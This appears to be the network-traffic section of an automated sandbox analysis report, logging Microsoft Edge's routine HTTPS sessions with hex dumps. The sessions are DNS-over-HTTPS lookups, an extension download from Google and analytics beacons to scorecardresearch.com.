                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e5021fc778d0-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 22 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom")


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                6192.168.2.750016142.250.185.1294432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC7rClyv0uz6BrFUmf-ryDJI3ZRKl1kGz2pVkOiQg2vAV76vun2MdAynDRNovH8g-GGQGjK7DYQ
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                                                                Date: Mon, 06 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                                Expires: Tue, 06 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                Age: 73257
                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                                                Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                                                Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                                                Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                                                Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                                                                                                                                                Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                                                Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                                                Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                                                Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                                                Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                7192.168.2.750025172.64.41.34432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:11 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:10 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e509b96843b0-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:11 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0d 05 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 21 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 33 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 35 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetA!)prod-agic-eu2-3eastus2cloudappazure,50ns1-06azure-dns,msnhst"',:<)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                8192.168.2.75000318.244.18.324432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:10 UTC925OUTGET /b?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:11 UTC956INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:11 GMT
                                                                                                                                                                                                                                                                                                Location: /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                set-cookie: UID=13987848475950bac8edbe91736252351; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                set-cookie: XID=13987848475950bac8edbe91736252351; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 abf6c055b398b223d7325958955066c0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: wXabtqFyTWWIxOX1IBq9KncukHF8NhT1vq1Frm4NgjqPI_R49E-4LA==


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                9192.168.2.75003518.164.96.904432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC1012OUTGET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:12 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:12 GMT
